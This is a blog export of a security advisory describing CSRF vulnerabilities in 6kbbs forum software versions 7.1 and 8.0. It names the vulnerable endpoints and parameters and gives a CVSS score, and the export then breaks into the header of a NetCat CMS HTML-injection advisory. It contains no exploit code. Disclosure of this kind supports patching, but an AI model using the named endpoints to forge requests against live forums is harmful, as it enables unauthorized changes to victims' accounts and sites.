<b><span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity WLB-2015040034 6kbbs v8.0 Multiple CSRF (Cross-Site Request Forgery) Web Security Vulnerabilities</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: 6kbbs Multiple CSRF (Cross-Site Request Forgery) Security Vulnerabilities</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: 6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: 6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: v7.1 v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: v7.1 v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 02, 2015</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Latest Update: April 02, 2015</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Type: Cross-Site Request Forgery (CSRF) [CWE-352]</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVE Reference: *</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CXSecurity Reference: WLB-2015040034 </span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact CVSS Severity (version 2.0):</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS v2 Base Score: 6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P) (legend)</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Subscore: 6.4</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploitability Subscore: 8.6</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">CVSS Version 2 Metrics:</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Vector: Network exploitable; Victim must voluntarily interact with attack mechanism</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Access Complexity: Medium</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Authentication: Not required to exploit</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Impact Type: Allows unauthorized disclosure of information; Allows unauthorized modification; Allows disruption of service</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Writer and Reporter: <span style="background-color: white; line-height: 18.2000007629395px;">Jing Wang, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. (</span><a href="https://twitter.com/justqdjing/status/583550839408627712">@justqdjing</a><span style="background-color: white; line-height: 18.2000007629395px;">)</span></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Suggestion Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>(1) Vendor & Product Description:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b><br /></b><b><br /></b><b>Vendor:</b></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product & Vulnerable Versions:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">v7.1</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">v8.0</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vendor URL & download:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs can be gain from here,</span></div>
<div style="margin: 0px;">
<a href="http://www.6kbbs.com/download.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.6kbbs.com/download.html</span></a></div>
<div style="margin: 0px;">
<a href="http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://en.sourceforge.jp/projects/sfnet_buzhang/downloads/6kbbs.zip/</span></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Product Introduction Overview:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"6kbbs V8.0 is a PHP + MySQL built using high-performance forum, has the code simple, easy to use, powerful, fast and so on. It is an excellent community forum program. The program is simple but not simple; fast, small; Interface generous and good scalability; functional and practical pursuing superior performance, good interface, the user's preferred utility functions."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">"1, using XHTML + CSS architecture, so that the structure of the page, saving transmission static page code, but also easy to modify the interface, more in line with WEB standards; 2, the Forum adopted Cookies, Session, Application and other technical data cache on the forum, reducing access to the database to improve the performance of the Forum. Can carry more users simultaneously access; 3, the data points table function, reduce the burden on the amount of data when accessing the database; 4, support for multi-skin style switching function; 5, the use of RSS technology to support subscriptions forum posts, recent posts, user's posts; 6, the display frame mode + tablet mode, the user can choose according to their own preferences to; 7. forum page optimization keyword search, so the forum more easily indexed by search engines; 8, extension, for our friends to provide a forum for a broad expansion of space services; 9, webmasters can add different top and bottom of the ad, depending on the layout; 10, post using HTML + UBB way the two editors, mutual conversion, compatible with each other; ..."</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) Vulnerability Details:</span></b></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">6kbbs web application has a computer cyber security bug problem. It can be exploited by CSRF (Cross-Site Request Forgery) attacks. This may allow an attacker to trick the victim into clicking on the image to take advantage of the trust relationship between the authenticated victim and the application. Such an attack could trick the victim into creating files that may then be called via a separate CSRF attack or possibly other means, and executed in the context of their session with the application, without further prompting or verification.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Several 6kbbs products 0-day vulnerabilities have been found by some other bug hunter researchers before. 6kbbs has patched some of them. Open Sourced Vulnerability Database (OSVDB) is an independent and open-sourced database. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities. The project promotes greater, open collaboration between companies and individuals. It has published suggestions, advisories, solutions details related to csrf vulnerabilities.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1)<span class="Apple-converted-space"> </span></b>The first code programming flaw occurs at "/portalchannel_ajax.php?" page with "&id" and &code" parameters in HTTP $POST.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.2)<span class="Apple-converted-space"> </span></b>The second code programming flaw occurs at "/admin.php?" page with "&fileids" parameter in HTTP $POST.</span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="margin: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Related Articles:</span></b></div>
<div style="margin: 0px;">
<a href="http://cxsecurity.com/issue/WLB-2015040034"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://cxsecurity.com/issue/WLB-2015040034</span></a></div>
<div style="margin: 0px;">
<a href="http://lists.openwall.net/full-disclosure/2015/04/05/7"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2015/04/05/7</span></a></div>
<div style="margin: 0px;">
<a href="http://www.intelligentexploit.com/view-details.html?id=21071"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.intelligentexploit.com/view-details.html?id=21071</span></a></div>
<div style="margin: 0px;">
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1819</span></a></div>
<div style="margin: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure@seclists.org/msg01902.html</span></a></div>
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2015/Apr/13"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2015/Apr/13</span></a></div>
<div style="margin: 0px;">
<a href="http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.tetraph.com/security/csrf-vulnerability/6kbbs-v8-0-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://essayjeans.blog.163.com/blog/static/237173074201551435316925/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://essayjeans.blog.163.com/blog/static/237173074201551435316925/</span></a></div>
<div style="margin: 0px;">
<a href="https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2015/04/14/6kbbs-crsf/</span></a></div>
<div style="margin: 0px;">
<a href="http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://frenchairing.blogspot.fr/2015/06/6kbbs-crsf.html</span></a></div>
<div style="margin: 0px;">
<a href="http://tetraph.blog.163.com/blog/static/234603051201551444917365/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.blog.163.com/blog/static/234603051201551444917365/</span></a></div>
<div style="margin: 0px;">
<a href="http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://diebiyi.com/articles/security/6kbbs-v8-0-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securityrelated.blogspot.com/2015/04/6kbbs-v80-multiple-csrf-cross-site.html</span></a></div>
<div style="margin: 0px;">
<a href="https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://hackertopic.wordpress.com/2015/04/02/6kbbs-v8-0-multiple-csrf</span></a></div>
<div style="margin: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-multiple-csrf-cross-site-request-forgery-security-vulnerabilities/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/computer-web-security/6kbbs-v8-0-csrf</span></a></div>
<div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-61182958285487221002015-06-14T01:11:00.000-07:002015-06-14T01:11:35.970-07:00OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy6Vd783IIPUsUWFKP2SrE1h2ohW2WhgOmXZ_7uDU0zlmsCzDdiUjqnBtrOFf_syO3-SogBomceVFfnNcOqh_Y7vFf7ALO6R-LYwzfLP0hXQ95IymaJmnz4E2GxkGHLeUA5oI8J_YSs8o/s1600/netcat_3.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgy6Vd783IIPUsUWFKP2SrE1h2ohW2WhgOmXZ_7uDU0zlmsCzDdiUjqnBtrOFf_syO3-SogBomceVFfnNcOqh_Y7vFf7ALO6R-LYwzfLP0hXQ95IymaJmnz4E2GxkGHLeUA5oI8J_YSs8o/s400/netcat_3.png" style="cursor: move;" width="400" /></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">OSVDB 120807 NetCat CMS 3.12 HTML Injection Web Security Vulnerabilities</span></b></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Exploit Title: NetCat CMS 3.12 /catalog/search.php? q Parameter HTML Injection Web Security Vulnerabilities</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Product: NetCat CMS (Content Management System)</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vendor: NetCat</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable Versions: 3.12 3.0 2.4 2.3 2.2 2.1 2.0 1.1</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Tested Version: 3.12</span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;">Advisory Publication: April 15, 2015</span></div>
